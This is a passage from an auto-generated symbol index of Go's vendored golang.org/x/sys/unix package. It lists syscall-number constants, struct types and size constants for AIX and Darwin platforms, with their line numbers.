SYS___EXPM1L_B (line 2541) | SYS___EXPM1L_B = 0x853 constant SYS___FDIMF_B (line 2542) | SYS___FDIMF_B = 0x854 constant SYS___FDIM_B (line 2543) | SYS___FDIM_B = 0x855 constant SYS___FDIML_B (line 2544) | SYS___FDIML_B = 0x856 constant SYS___HYPOTF_B (line 2545) | SYS___HYPOTF_B = 0x857 constant SYS___HYPOTL_B (line 2546) | SYS___HYPOTL_B = 0x858 constant SYS___LOG1PF_B (line 2547) | SYS___LOG1PF_B = 0x859 constant SYS___REMQUOF_B (line 2548) | SYS___REMQUOF_B = 0x860 constant SYS___REMQUO_B (line 2549) | SYS___REMQUO_B = 0x861 constant SYS___REMQUOL_B (line 2550) | SYS___REMQUOL_B = 0x862 constant SYS___TGAMMAF_B (line 2551) | SYS___TGAMMAF_B = 0x863 constant SYS___TGAMMA_B (line 2552) | SYS___TGAMMA_B = 0x864 constant SYS___TGAMMAL_B (line 2553) | SYS___TGAMMAL_B = 0x865 constant SYS___TRUNCF_B (line 2554) | SYS___TRUNCF_B = 0x866 constant SYS___TRUNC_B (line 2555) | SYS___TRUNC_B = 0x867 constant SYS___TRUNCL_B (line 2556) | SYS___TRUNCL_B = 0x868 constant SYS___LGAMMAF_B (line 2557) | SYS___LGAMMAF_B = 0x869 constant SYS_ASINHF (line 2558) | SYS_ASINHF = 0x870 constant SYS_ASINHL (line 2559) | SYS_ASINHL = 0x871 constant SYS_ATANHF (line 2560) | SYS_ATANHF = 0x872 constant SYS_ATANHL (line 2561) | SYS_ATANHL = 0x873 constant SYS_CBRTF (line 2562) | SYS_CBRTF = 0x874 constant SYS_CBRTL (line 2563) | SYS_CBRTL = 0x875 constant SYS_COPYSIGNF (line 2564) | SYS_COPYSIGNF = 0x876 constant SYS_CPYSIGNF (line 2565) | SYS_CPYSIGNF = 0x876 constant SYS_COPYSIGNL (line 2566) | SYS_COPYSIGNL = 0x877 constant SYS_CPYSIGNL (line 2567) | SYS_CPYSIGNL = 0x877 constant SYS_COTANF (line 2568) | SYS_COTANF = 0x878 constant SYS___COTANF (line 2569) | SYS___COTANF = 0x878 constant SYS_COTAN (line 2570) | SYS_COTAN = 0x879 constant SYS___COTAN (line 2571) | SYS___COTAN = 0x879 constant SYS_FDIM (line 2572) | SYS_FDIM = 0x881 constant SYS_FDIML (line 2573) | SYS_FDIML = 0x882 constant SYS_HYPOTF (line 2574) | SYS_HYPOTF = 0x883 constant SYS_HYPOTL (line 2575) | SYS_HYPOTL = 0x884 constant SYS_LOG1PF (line 2576) | SYS_LOG1PF = 0x885 constant SYS_LOG1PL (line 2577) | SYS_LOG1PL = 0x886 constant SYS_LOG2F (line 2578) | SYS_LOG2F = 0x887 constant SYS_LOG2 (line 2579) | SYS_LOG2 = 0x888 constant SYS_LOG2L (line 2580) | SYS_LOG2L = 0x889 constant SYS_TGAMMA (line 2581) | SYS_TGAMMA = 0x890 constant SYS_TGAMMAL (line 2582) | SYS_TGAMMAL = 0x891 constant SYS_TRUNCF (line 2583) | SYS_TRUNCF = 0x892 constant SYS_TRUNC (line 2584) | SYS_TRUNC = 0x893 constant SYS_TRUNCL (line 2585) | SYS_TRUNCL = 0x894 constant SYS_LGAMMAF (line 2586) | SYS_LGAMMAF = 0x895 constant SYS_LGAMMAL (line 2587) | SYS_LGAMMAL = 0x896 constant SYS_LROUNDF (line 2588) | SYS_LROUNDF = 0x897 constant SYS_LROUND (line 2589) | SYS_LROUND = 0x898 constant SYS_ERFF (line 2590) | SYS_ERFF = 0x899 constant SYS___COSHF_H (line 2591) | SYS___COSHF_H = 0x900 constant SYS___COSHL_H (line 2592) | SYS___COSHL_H = 0x901 constant SYS___COTAN_H (line 2593) | SYS___COTAN_H = 0x902 constant SYS___COTANF_H (line 2594) | SYS___COTANF_H = 0x903 constant SYS___COTANL_H (line 2595) | SYS___COTANL_H = 0x904 constant SYS___ERF_H (line 2596) | SYS___ERF_H = 0x905 constant SYS___ERFF_H (line 2597) | SYS___ERFF_H = 0x906 constant SYS___ERFL_H (line 2598) | SYS___ERFL_H = 0x907 constant SYS___ERFC_H (line 2599) | SYS___ERFC_H = 0x908 constant SYS___ERFCF_H (line 2600) | SYS___ERFCF_H = 0x909 constant SYS___FDIMF_H (line 2601) | SYS___FDIMF_H = 0x910 constant SYS___FDIML_H (line 2602) | SYS___FDIML_H = 0x911 constant SYS___FMOD_H (line 2603) | SYS___FMOD_H = 0x912 constant SYS___FMODF_H (line 2604) | SYS___FMODF_H = 0x913 constant SYS___FMODL_H (line 2605) | SYS___FMODL_H = 0x914 constant SYS___GAMMA_H (line 2606) | SYS___GAMMA_H = 0x915 constant SYS___HYPOT_H (line 2607) | SYS___HYPOT_H = 0x916 constant SYS___ILOGB_H (line 2608) | SYS___ILOGB_H = 0x917 constant SYS___LGAMMA_H (line 2609) | SYS___LGAMMA_H = 0x918 constant SYS___LGAMMAF_H (line 2610) | SYS___LGAMMAF_H = 0x919 constant SYS___LOG2L_H (line 2611) | SYS___LOG2L_H = 0x920 constant SYS___LOG1P_H (line 2612) | SYS___LOG1P_H = 0x921 constant SYS___LOG10_H (line 2613) | SYS___LOG10_H = 0x922 constant SYS___LOG10F_H (line 2614) | SYS___LOG10F_H = 0x923 constant SYS___LOG10L_H (line 2615) | SYS___LOG10L_H = 0x924 constant SYS___LROUND_H (line 2616) | SYS___LROUND_H = 0x925 constant SYS___LROUNDF_H (line 2617) | SYS___LROUNDF_H = 0x926 constant SYS___NEXTAFTER_H (line 2618) | SYS___NEXTAFTER_H = 0x927 constant SYS___POW_H (line 2619) | SYS___POW_H = 0x928 constant SYS___POWF_H (line 2620) | SYS___POWF_H = 0x929 constant SYS___SINL_H (line 2621) | SYS___SINL_H = 0x930 constant SYS___SINH_H (line 2622) | SYS___SINH_H = 0x931 constant SYS___SINHF_H (line 2623) | SYS___SINHF_H = 0x932 constant SYS___SINHL_H (line 2624) | SYS___SINHL_H = 0x933 constant SYS___SQRT_H (line 2625) | SYS___SQRT_H = 0x934 constant SYS___SQRTF_H (line 2626) | SYS___SQRTF_H = 0x935 constant SYS___SQRTL_H (line 2627) | SYS___SQRTL_H = 0x936 constant SYS___TAN_H (line 2628) | SYS___TAN_H = 0x937 constant SYS___TANF_H (line 2629) | SYS___TANF_H = 0x938 constant SYS___TANL_H (line 2630) | SYS___TANL_H = 0x939 constant SYS___TRUNCF_H (line 2631) | SYS___TRUNCF_H = 0x940 constant SYS___TRUNCL_H (line 2632) | SYS___TRUNCL_H = 0x941 constant SYS___COSH_H (line 2633) | SYS___COSH_H = 0x942 constant SYS___LE_DEBUG_SET_RESUME_MCH (line 2634) | SYS___LE_DEBUG_SET_RESUME_MCH = 0x943 constant SYS_VFSCANF (line 2635) | SYS_VFSCANF = 0x944 constant SYS_VSCANF (line 2636) | SYS_VSCANF = 0x946 constant SYS_VSSCANF (line 2637) | SYS_VSSCANF = 0x948 constant SYS_IMAXABS (line 2638) | SYS_IMAXABS = 0x950 constant SYS_IMAXDIV (line 2639) | SYS_IMAXDIV = 0x951 constant SYS_STRTOIMAX (line 2640) | SYS_STRTOIMAX = 0x952 constant SYS_STRTOUMAX (line 2641) | SYS_STRTOUMAX = 0x953 constant SYS_WCSTOIMAX (line 2642) | SYS_WCSTOIMAX = 0x954 constant SYS_WCSTOUMAX (line 2643) | SYS_WCSTOUMAX = 0x955 constant SYS_ATOLL (line 2644) | SYS_ATOLL = 0x956 constant SYS_STRTOF (line 2645) | SYS_STRTOF = 0x957 constant SYS_STRTOLD (line 2646) | SYS_STRTOLD = 0x958 constant SYS_WCSTOF (line 2647) | SYS_WCSTOF = 0x959 constant SYS_INET6_RTH_GETADDR (line 2648) | SYS_INET6_RTH_GETADDR = 0x960 constant SYS_INET6_OPT_INIT (line 2649) | SYS_INET6_OPT_INIT = 0x961 constant SYS_INET6_OPT_APPEND (line 2650) | SYS_INET6_OPT_APPEND = 0x962 constant SYS_INET6_OPT_FINISH (line 2651) | SYS_INET6_OPT_FINISH = 0x963 constant SYS_INET6_OPT_SET_VAL (line 2652) | SYS_INET6_OPT_SET_VAL = 0x964 constant SYS_INET6_OPT_NEXT (line 2653) | SYS_INET6_OPT_NEXT = 0x965 constant SYS_INET6_OPT_FIND (line 2654) | SYS_INET6_OPT_FIND = 0x966 constant SYS_INET6_OPT_GET_VAL (line 2655) | SYS_INET6_OPT_GET_VAL = 0x967 constant SYS___POW_I (line 2656) | SYS___POW_I = 0x987 constant SYS___POW_I_B (line 2657) | SYS___POW_I_B = 0x988 constant SYS___POW_I_H (line 2658) | SYS___POW_I_H = 0x989 constant SYS___CABS_H (line 2659) | SYS___CABS_H = 0x990 constant SYS_CABSF (line 2660) | SYS_CABSF = 0x991 constant SYS___CABSF_B (line 2661) | SYS___CABSF_B = 0x992 constant SYS___CABSF_H (line 2662) | SYS___CABSF_H = 0x993 constant SYS_CABSL (line 2663) | SYS_CABSL = 0x994 constant SYS___CABSL_B (line 2664) | SYS___CABSL_B = 0x995 constant SYS___CABSL_H (line 2665) | SYS___CABSL_H = 0x996 constant SYS_CACOS (line 2666) | SYS_CACOS = 0x997 constant SYS___CACOS_B (line 2667) | SYS___CACOS_B = 0x998 constant SYS___CACOS_H (line 2668) | SYS___CACOS_H = 0x999 FILE: vendor/golang.org/x/sys/unix/ztypes_aix_ppc.go constant SizeofPtr (line 9) | SizeofPtr = 0x4 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x4 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 constant PathMax (line 14) | PathMax = 0x3ff type _C_short (line 18) | type _C_short type _C_int (line 19) | type _C_int type _C_long (line 20) | type _C_long type _C_long_long (line 21) | type _C_long_long type off64 (line 24) | type off64 type off (line 25) | type off type Mode_t (line 26) | type Mode_t type Timespec (line 28) | type Timespec struct type Timeval (line 33) | type Timeval struct type Timeval32 (line 38) | type Timeval32 struct type Timex (line 43) | type Timex struct type Time_t (line 45) | type Time_t type Tms (line 47) | type Tms struct type Utimbuf (line 49) | type Utimbuf struct type Timezone (line 54) | type Timezone struct type Rusage (line 59) | type Rusage struct type Rlimit (line 78) | type Rlimit struct type Pid_t (line 83) | type Pid_t type _Gid_t (line 85) | type _Gid_t type dev_t (line 87) | type dev_t type Stat_t (line 89) | type Stat_t struct type StatxTimestamp (line 111) | type StatxTimestamp struct type Statx_t (line 113) | type Statx_t struct type Dirent (line 115) | type Dirent struct type RawSockaddrInet4 (line 123) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 131) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 140) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 146) | type RawSockaddrDatalink struct type RawSockaddr (line 157) | type RawSockaddr struct type RawSockaddrAny (line 163) | type RawSockaddrAny struct type _Socklen (line 168) | type _Socklen type Cmsghdr (line 170) | type Cmsghdr struct type ICMPv6Filter (line 176) | type ICMPv6Filter struct type Iovec (line 180) | type Iovec struct type IPMreq (line 185) | type IPMreq struct type IPv6Mreq (line 190) | type IPv6Mreq struct type IPv6MTUInfo (line 195) | type IPv6MTUInfo struct type Linger (line 200) | type Linger struct type Msghdr (line 205) | type Msghdr struct constant SizeofSockaddrInet4 (line 216) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 217) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 218) | SizeofSockaddrAny = 0x404 constant SizeofSockaddrUnix (line 219) | SizeofSockaddrUnix = 0x401 constant SizeofSockaddrDatalink (line 220) | SizeofSockaddrDatalink = 0x80 constant SizeofLinger (line 221) | SizeofLinger = 0x8 constant SizeofIovec (line 222) | SizeofIovec = 0x8 constant SizeofIPMreq (line 223) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 224) | SizeofIPv6Mreq = 0x14 constant SizeofIPv6MTUInfo (line 225) | SizeofIPv6MTUInfo = 0x20 constant SizeofMsghdr (line 226) | SizeofMsghdr = 0x1c constant SizeofCmsghdr (line 227) | SizeofCmsghdr = 0xc constant SizeofICMPv6Filter (line 228) | SizeofICMPv6Filter = 0x20 constant SizeofIfMsghdr (line 232) | SizeofIfMsghdr = 0x10 type IfMsgHdr (line 235) | type IfMsgHdr struct type FdSet (line 246) | type FdSet struct type Utsname (line 250) | type Utsname struct type Ustat_t (line 258) | type Ustat_t struct type Sigset_t (line 260) | type Sigset_t struct constant AT_FDCWD (line 266) | AT_FDCWD = -0x2 constant AT_REMOVEDIR (line 267) | AT_REMOVEDIR = 0x1 constant AT_SYMLINK_NOFOLLOW (line 268) | AT_SYMLINK_NOFOLLOW = 0x1 type Termios (line 271) | type Termios struct type Termio (line 279) | type Termio struct type Winsize (line 289) | type Winsize struct type PollFd (line 296) | type PollFd struct constant POLLERR (line 303) | POLLERR = 0x4000 constant POLLHUP (line 304) | POLLHUP = 0x2000 constant POLLIN (line 305) | POLLIN = 0x1 constant POLLNVAL (line 306) | POLLNVAL = 0x8000 constant POLLOUT (line 307) | POLLOUT = 0x2 constant POLLPRI (line 308) | POLLPRI = 0x4 constant POLLRDBAND (line 309) | POLLRDBAND = 0x20 constant POLLRDNORM (line 310) | POLLRDNORM = 0x10 constant POLLWRBAND (line 311) | POLLWRBAND = 0x40 constant POLLWRNORM (line 312) | POLLWRNORM = 0x2 type Flock_t (line 315) | type Flock_t struct type Fsid_t (line 325) | type Fsid_t struct type Fsid64_t (line 328) | type Fsid64_t struct type Statfs_t (line 332) | type Statfs_t struct constant RNDGETENTCNT (line 353) | RNDGETENTCNT = 0x80045200 FILE: vendor/golang.org/x/sys/unix/ztypes_aix_ppc64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 constant PathMax (line 14) | PathMax = 0x3ff type _C_short (line 18) | type _C_short type _C_int (line 19) | type _C_int type _C_long (line 20) | type _C_long type _C_long_long (line 21) | type _C_long_long type off64 (line 24) | type off64 type off (line 25) | type off type Mode_t (line 26) | type Mode_t type Timespec (line 28) | type Timespec struct type Timeval (line 33) | type Timeval struct type Timeval32 (line 39) | type Timeval32 struct type Timex (line 44) | type Timex struct type Time_t (line 46) | type Time_t type Tms (line 48) | type Tms struct type Utimbuf (line 50) | type Utimbuf struct type Timezone (line 55) | type Timezone struct type Rusage (line 60) | type Rusage struct type Rlimit (line 79) | type Rlimit struct type Pid_t (line 84) | type Pid_t type _Gid_t (line 86) | type _Gid_t type dev_t (line 88) | type dev_t type Stat_t (line 90) | type Stat_t struct type StatxTimestamp (line 114) | type StatxTimestamp struct type Statx_t (line 116) | type Statx_t struct type Dirent (line 118) | type Dirent struct type RawSockaddrInet4 (line 127) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 135) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 144) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 150) | type RawSockaddrDatalink struct type RawSockaddr (line 161) | type RawSockaddr struct type RawSockaddrAny (line 167) | type RawSockaddrAny struct type _Socklen (line 172) | type _Socklen type Cmsghdr (line 174) | type Cmsghdr struct type ICMPv6Filter (line 180) | type ICMPv6Filter struct type Iovec (line 184) | type Iovec struct type IPMreq (line 189) | type IPMreq struct type IPv6Mreq (line 194) | type IPv6Mreq struct type IPv6MTUInfo (line 199) | type IPv6MTUInfo struct type Linger (line 204) | type Linger struct type Msghdr (line 209) | type Msghdr struct constant SizeofSockaddrInet4 (line 220) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 221) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 222) | SizeofSockaddrAny = 0x404 constant SizeofSockaddrUnix (line 223) | SizeofSockaddrUnix = 0x401 constant SizeofSockaddrDatalink (line 224) | SizeofSockaddrDatalink = 0x80 constant SizeofLinger (line 225) | SizeofLinger = 0x8 constant SizeofIovec (line 226) | SizeofIovec = 0x10 constant SizeofIPMreq (line 227) | SizeofIPMreq = 0x8 constant SizeofIPv6Mreq (line 228) | SizeofIPv6Mreq = 0x14 constant SizeofIPv6MTUInfo (line 229) | SizeofIPv6MTUInfo = 0x20 constant SizeofMsghdr (line 230) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 231) | SizeofCmsghdr = 0xc constant SizeofICMPv6Filter (line 232) | SizeofICMPv6Filter = 0x20 constant SizeofIfMsghdr (line 236) | SizeofIfMsghdr = 0x10 type IfMsgHdr (line 239) | type IfMsgHdr struct type FdSet (line 250) | type FdSet struct type Utsname (line 254) | type Utsname struct type Ustat_t (line 262) | type Ustat_t struct type Sigset_t (line 264) | type Sigset_t struct constant AT_FDCWD (line 269) | AT_FDCWD = -0x2 constant AT_REMOVEDIR (line 270) | AT_REMOVEDIR = 0x1 constant AT_SYMLINK_NOFOLLOW (line 271) | AT_SYMLINK_NOFOLLOW = 0x1 type Termios (line 274) | type Termios struct type Termio (line 282) | type Termio struct type Winsize (line 292) | type Winsize struct type PollFd (line 299) | type PollFd struct constant POLLERR (line 306) | POLLERR = 0x4000 constant POLLHUP (line 307) | POLLHUP = 0x2000 constant POLLIN (line 308) | POLLIN = 0x1 constant POLLNVAL (line 309) | POLLNVAL = 0x8000 constant POLLOUT (line 310) | POLLOUT = 0x2 constant POLLPRI (line 311) | POLLPRI = 0x4 constant POLLRDBAND (line 312) | POLLRDBAND = 0x20 constant POLLRDNORM (line 313) | POLLRDNORM = 0x10 constant POLLWRBAND (line 314) | POLLWRBAND = 0x40 constant POLLWRNORM (line 315) | POLLWRNORM = 0x2 type Flock_t (line 318) | type Flock_t struct type Fsid_t (line 328) | type Fsid_t struct type Fsid64_t (line 331) | type Fsid64_t struct type Statfs_t (line 335) | type Statfs_t struct constant RNDGETENTCNT (line 357) | RNDGETENTCNT = 0x80045200 FILE: vendor/golang.org/x/sys/unix/ztypes_darwin_amd64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Timeval32 (line 34) | type Timeval32 struct type Rusage (line 39) | type Rusage struct type Rlimit (line 58) | type Rlimit struct type _Gid_t (line 63) | type _Gid_t type Stat_t (line 65) | type Stat_t struct type Statfs_t (line 86) | type Statfs_t struct type Flock_t (line 106) | type Flock_t struct type Fstore_t (line 114) | type Fstore_t struct type Radvisory_t (line 122) | type Radvisory_t struct type Fbootstraptransfer_t (line 128) | type Fbootstraptransfer_t struct type Log2phys_t (line 134) | type Log2phys_t struct type Fsid (line 139) | type Fsid struct type Dirent (line 143) | type Dirent struct type Attrlist (line 153) | type Attrlist struct constant PathMax (line 164) | PathMax = 0x400 type RawSockaddrInet4 (line 167) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 175) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 184) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 190) | type RawSockaddrDatalink struct type RawSockaddr (line 201) | type RawSockaddr struct type RawSockaddrAny (line 207) | type RawSockaddrAny struct type RawSockaddrCtl (line 212) | type RawSockaddrCtl struct type RawSockaddrVM (line 221) | type RawSockaddrVM struct type XVSockPCB (line 229) | type XVSockPCB struct type XSocket (line 246) | type XSocket struct type XSocket64 (line 268) | type XSocket64 struct type XSockbuf (line 290) | type XSockbuf struct type XVSockPgen (line 300) | type XVSockPgen struct type _Socklen (line 307) | type _Socklen type Xucred (line 309) | type Xucred struct type Linger (line 316) | type Linger struct type Iovec (line 321) | type Iovec struct type IPMreq (line 326) | type IPMreq struct type IPMreqn (line 331) | type IPMreqn struct type IPv6Mreq (line 337) | type IPv6Mreq struct type Msghdr (line 342) | type Msghdr struct type Cmsghdr (line 352) | type Cmsghdr struct type Inet4Pktinfo (line 358) | type Inet4Pktinfo struct type Inet6Pktinfo (line 364) | type Inet6Pktinfo struct type IPv6MTUInfo (line 369) | type IPv6MTUInfo struct type ICMPv6Filter (line 374) | type ICMPv6Filter struct type TCPConnectionInfo (line 378) | type TCPConnectionInfo struct constant SizeofSockaddrInet4 (line 405) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 406) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 407) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 408) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 409) | SizeofSockaddrDatalink = 0x14 constant SizeofSockaddrCtl (line 410) | SizeofSockaddrCtl = 0x20 constant SizeofSockaddrVM (line 411) | SizeofSockaddrVM = 0xc constant SizeofXvsockpcb (line 412) | SizeofXvsockpcb = 0xa8 constant SizeofXSocket (line 413) | SizeofXSocket = 0x64 constant SizeofXSockbuf (line 414) | SizeofXSockbuf = 0x18 constant SizeofXVSockPgen (line 415) | SizeofXVSockPgen = 0x20 constant SizeofXucred (line 416) | SizeofXucred = 0x4c constant SizeofLinger (line 417) | SizeofLinger = 0x8 constant SizeofIovec (line 418) | SizeofIovec = 0x10 constant SizeofIPMreq (line 419) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 420) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 421) | SizeofIPv6Mreq = 0x14 constant SizeofMsghdr (line 422) | SizeofMsghdr = 0x30 constant SizeofCmsghdr (line 423) | SizeofCmsghdr = 0xc constant SizeofInet4Pktinfo (line 424) | SizeofInet4Pktinfo = 0xc constant SizeofInet6Pktinfo (line 425) | SizeofInet6Pktinfo = 0x14 constant SizeofIPv6MTUInfo (line 426) | SizeofIPv6MTUInfo = 0x20 constant SizeofICMPv6Filter (line 427) | SizeofICMPv6Filter = 0x20 constant SizeofTCPConnectionInfo (line 428) | SizeofTCPConnectionInfo = 0x70 constant PTRACE_TRACEME (line 432) | PTRACE_TRACEME = 0x0 constant PTRACE_CONT (line 433) | PTRACE_CONT = 0x7 constant PTRACE_KILL (line 434) | PTRACE_KILL = 0x8 type Kevent_t (line 437) | type Kevent_t struct type FdSet (line 446) | type FdSet struct constant SizeofIfMsghdr (line 451) | SizeofIfMsghdr = 0x70 constant SizeofIfData (line 452) | SizeofIfData = 0x60 constant SizeofIfaMsghdr (line 453) | SizeofIfaMsghdr = 0x14 constant SizeofIfmaMsghdr (line 454) | SizeofIfmaMsghdr = 0x10 constant SizeofIfmaMsghdr2 (line 455) | SizeofIfmaMsghdr2 = 0x14 constant SizeofRtMsghdr (line 456) | SizeofRtMsghdr = 0x5c constant SizeofRtMetrics (line 457) | SizeofRtMetrics = 0x38 type IfMsghdr (line 460) | type IfMsghdr struct type IfData (line 470) | type IfData struct type IfaMsghdr (line 502) | type IfaMsghdr struct type IfmaMsghdr (line 512) | type IfmaMsghdr struct type IfmaMsghdr2 (line 522) | type IfmaMsghdr2 struct type RtMsghdr (line 532) | type RtMsghdr struct type RtMetrics (line 547) | type RtMetrics struct constant SizeofBpfVersion (line 563) | SizeofBpfVersion = 0x4 constant SizeofBpfStat (line 564) | SizeofBpfStat = 0x8 constant SizeofBpfProgram (line 565) | SizeofBpfProgram = 0x10 constant SizeofBpfInsn (line 566) | SizeofBpfInsn = 0x8 constant SizeofBpfHdr (line 567) | SizeofBpfHdr = 0x14 type BpfVersion (line 570) | type BpfVersion struct type BpfStat (line 575) | type BpfStat struct type BpfProgram (line 580) | type BpfProgram struct type BpfInsn (line 585) | type BpfInsn struct type BpfHdr (line 592) | type BpfHdr struct type Termios (line 600) | type Termios struct type Winsize (line 610) | type Winsize struct constant AT_FDCWD (line 618) | AT_FDCWD = -0x2 constant AT_REMOVEDIR (line 619) | AT_REMOVEDIR = 0x80 constant AT_SYMLINK_FOLLOW (line 620) | AT_SYMLINK_FOLLOW = 0x40 constant AT_SYMLINK_NOFOLLOW (line 621) | AT_SYMLINK_NOFOLLOW = 0x20 constant AT_EACCESS (line 622) | AT_EACCESS = 0x10 type PollFd (line 625) | type PollFd struct constant POLLERR (line 632) | POLLERR = 0x8 constant POLLHUP (line 633) | POLLHUP = 0x10 constant POLLIN (line 634) | POLLIN = 0x1 constant POLLNVAL (line 635) | POLLNVAL = 0x20 constant POLLOUT (line 636) | POLLOUT = 0x4 constant POLLPRI (line 637) | POLLPRI = 0x2 constant POLLRDBAND (line 638) | POLLRDBAND = 0x80 constant POLLRDNORM (line 639) | POLLRDNORM = 0x40 constant POLLWRBAND (line 640) | POLLWRBAND = 0x100 constant POLLWRNORM (line 641) | POLLWRNORM = 0x4 type Utsname (line 644) | type Utsname struct constant SizeofClockinfo (line 652) | SizeofClockinfo = 0x14 type Clockinfo (line 654) | type Clockinfo struct type CtlInfo (line 662) | type CtlInfo struct constant SizeofKinfoProc (line 667) | SizeofKinfoProc = 0x288 type Eproc (line 669) | type Eproc struct type ExternProc (line 692) | type ExternProc struct type Itimerval (line 736) | type Itimerval struct type KinfoProc (line 741) | type KinfoProc struct type Vmspace (line 746) | type Vmspace struct type Pcred (line 753) | type Pcred struct type Ucred (line 764) | type Ucred struct type SysvIpcPerm (line 771) | type SysvIpcPerm struct type SysvShmDesc (line 780) | type SysvShmDesc struct constant IPC_CREAT (line 790) | IPC_CREAT = 0x200 constant IPC_EXCL (line 791) | IPC_EXCL = 0x400 constant IPC_NOWAIT (line 792) | IPC_NOWAIT = 0x800 constant IPC_PRIVATE (line 793) | IPC_PRIVATE = 0x0 constant IPC_RMID (line 797) | IPC_RMID = 0x0 constant IPC_SET (line 798) | IPC_SET = 0x1 constant IPC_STAT (line 799) | IPC_STAT = 0x2 constant SHM_RDONLY (line 803) | SHM_RDONLY = 0x1000 constant SHM_RND (line 804) | SHM_RND = 0x2000 FILE: vendor/golang.org/x/sys/unix/ztypes_darwin_arm64.go constant SizeofPtr (line 9) | SizeofPtr = 0x8 constant SizeofShort (line 10) | SizeofShort = 0x2 constant SizeofInt (line 11) | SizeofInt = 0x4 constant SizeofLong (line 12) | SizeofLong = 0x8 constant SizeofLongLong (line 13) | SizeofLongLong = 0x8 type _C_short (line 17) | type _C_short type _C_int (line 18) | type _C_int type _C_long (line 19) | type _C_long type _C_long_long (line 20) | type _C_long_long type Timespec (line 23) | type Timespec struct type Timeval (line 28) | type Timeval struct type Timeval32 (line 34) | type Timeval32 struct type Rusage (line 39) | type Rusage struct type Rlimit (line 58) | type Rlimit struct type _Gid_t (line 63) | type _Gid_t type Stat_t (line 65) | type Stat_t struct type Statfs_t (line 86) | type Statfs_t struct type Flock_t (line 106) | type Flock_t struct type Fstore_t (line 114) | type Fstore_t struct type Radvisory_t (line 122) | type Radvisory_t struct type Fbootstraptransfer_t (line 128) | type Fbootstraptransfer_t struct type Log2phys_t (line 134) | type Log2phys_t struct type Fsid (line 139) | type Fsid struct type Dirent (line 143) | type Dirent struct type Attrlist (line 153) | type Attrlist struct constant PathMax (line 164) | PathMax = 0x400 type RawSockaddrInet4 (line 167) | type RawSockaddrInet4 struct type RawSockaddrInet6 (line 175) | type RawSockaddrInet6 struct type RawSockaddrUnix (line 184) | type RawSockaddrUnix struct type RawSockaddrDatalink (line 190) | type RawSockaddrDatalink struct type RawSockaddr (line 201) | type RawSockaddr struct type RawSockaddrAny (line 207) | type RawSockaddrAny struct type RawSockaddrCtl (line 212) | type RawSockaddrCtl struct type RawSockaddrVM (line 221) | type RawSockaddrVM struct type XVSockPCB (line 229) | type XVSockPCB struct type XSocket (line 246) | type XSocket struct type XSocket64 (line 268) | type XSocket64 struct type XSockbuf (line 290) | type XSockbuf struct type XVSockPgen (line 300) | type XVSockPgen struct type _Socklen (line 307) | type _Socklen type Xucred (line 309) | type Xucred struct type Linger (line 316) | type Linger struct type Iovec (line 321) | type Iovec struct type IPMreq (line 326) | type IPMreq struct type IPMreqn (line 331) | type IPMreqn struct type IPv6Mreq (line 337) | type IPv6Mreq struct type Msghdr (line 342) | type Msghdr struct type Cmsghdr (line 352) | type Cmsghdr struct type Inet4Pktinfo (line 358) | type Inet4Pktinfo struct type Inet6Pktinfo (line 364) | type Inet6Pktinfo struct type IPv6MTUInfo (line 369) | type IPv6MTUInfo struct type ICMPv6Filter (line 374) | type ICMPv6Filter struct type TCPConnectionInfo (line 378) | type TCPConnectionInfo struct constant SizeofSockaddrInet4 (line 405) | SizeofSockaddrInet4 = 0x10 constant SizeofSockaddrInet6 (line 406) | SizeofSockaddrInet6 = 0x1c constant SizeofSockaddrAny (line 407) | SizeofSockaddrAny = 0x6c constant SizeofSockaddrUnix (line 408) | SizeofSockaddrUnix = 0x6a constant SizeofSockaddrDatalink (line 409) | SizeofSockaddrDatalink = 0x14 constant SizeofSockaddrCtl (line 410) | SizeofSockaddrCtl = 0x20 constant SizeofSockaddrVM (line 411) | SizeofSockaddrVM = 0xc constant SizeofXvsockpcb (line 412) | SizeofXvsockpcb = 0xa8 constant SizeofXSocket (line 413) | SizeofXSocket = 0x64 constant SizeofXSockbuf (line 414) | SizeofXSockbuf = 0x18 constant SizeofXVSockPgen (line 415) | SizeofXVSockPgen = 0x20 constant SizeofXucred (line 416) | SizeofXucred = 0x4c constant SizeofLinger (line 417) | SizeofLinger = 0x8 constant SizeofIovec (line 418) | SizeofIovec = 0x10 constant SizeofIPMreq (line 419) | SizeofIPMreq = 0x8 constant SizeofIPMreqn (line 420) | SizeofIPMreqn = 0xc constant SizeofIPv6Mreq (line 421) | 